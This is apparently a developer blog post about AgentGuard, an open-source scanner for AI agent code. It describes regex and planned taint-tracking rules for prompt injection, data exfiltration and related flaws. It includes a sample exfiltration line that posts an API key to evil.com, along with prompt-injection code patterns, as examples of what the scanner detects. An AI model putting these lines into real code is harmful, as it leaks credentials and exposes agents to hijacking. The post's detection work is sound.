Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities

AgentGuard, an open-source static analysis tool for AI agent vulnerabilities, uses regex-based rules to detect prompt injection and other flaws in source code. Its creator, Dockfix Labs, is developing AST-based semantic analysis to track taint flow and catch subtle patterns like data exfiltration. The tool currently covers 10 vulnerability categories and aims to make AI agent code as auditable as web application code.

When I started building AgentGuard https://github.com/dockfixlabs/agentguard , the first question was: how do you detect a prompt injection vulnerability in source code? Unlike traditional vulnerabilities SQL injection, XSS , prompt injection doesn't have a single signature. It's a pattern of untrusted data flowing into LLM context . The vulnerability isn't in a function call -- it's in how data is constructed. Every SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules: ASI01: Prompt Injection FSTRING INJECTION = re.compile r' ?:prompt|system|message|instruction \s := \s f "\' . \{. \}', re.I This catches the most common pattern: f-strings that embed user input directly into LLM prompts. It is blunt but effective. In a scan of 50 open-source agent codebases, this single rule found 127 instances. Regex has limits. Consider: Pattern A: Obvious prompt = f"You are a helper. {user input}" Pattern B: Subtle template = "You are a helper. {input}" prompt = template.format input=user data Pattern C: Hidden messages = {"role": "system", "content": config "system prompt" + user message} Pattern A is trivial to detect. Pattern B requires understanding .format semantics. Pattern C requires tracking data flow through dictionaries and list construction. This is where AgentGuard is headed next: AST-based semantic analysis . The next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow: user input , query , message , request.body openai.chat.completions.create , prompt , messages , system This is the same approach Semgrep and CodeQL use for traditional vulnerabilities, but specialized for LLM-specific sinks. AgentGuard already does a simple form of correlation for ASI03 Data Exfiltration : Line 1: Secret access api key = os.environ.get "API KEY" Line 2: Network call requests.post "https://evil.com/collect", headers={"Auth": api key} The rule checks if a secret-access pattern appears on line N and a network-exfiltration pattern appears on line N+1. This catches the most dangerous pattern: an agent that reads credentials and sends them externally. Future versions will extend this to full function-level taint tracking. AgentGuard currently covers all 10 categories: | ASI | Rule | Detection Method | |---|---|---| | ASI01 | Prompt Injection | Regex f-string, concat, format | | ASI02 | Tool Abuse | Regex os.system, subprocess, eval | | ASI03 | Data Exfiltration | Regex + cross-line correlation | | ASI04 | Excessive Agency | Regex auto-execute, no-confirm | | ASI05 | Supply Chain | Regex untrusted pip install, dynamic import | | ASI06 | Insecure Output | Regex raw HTML, eval output | | ASI07 | Credential Exposure | Regex API keys, private keys, passwords | | ASI08 | Context Manipulation | Regex context stuffing, token bombing | | ASI09 | Agent Loop Exploitation | Regex recursive calls, no depth limit | | ASI10 | Trust Boundary | Regex mixed privilege, cross-agent calls | The benchmark suite https://github.com/dockfixlabs/agentguard-benchmark has 28 samples: The long-term goal is simple: make AI agent code as auditable as web application code . We have Semgrep for web apps. We need AgentGuard for agent apps. AgentGuard https://github.com/dockfixlabs/agentguard is MIT-licensed and open source. Install with pip install dfx-agentguard .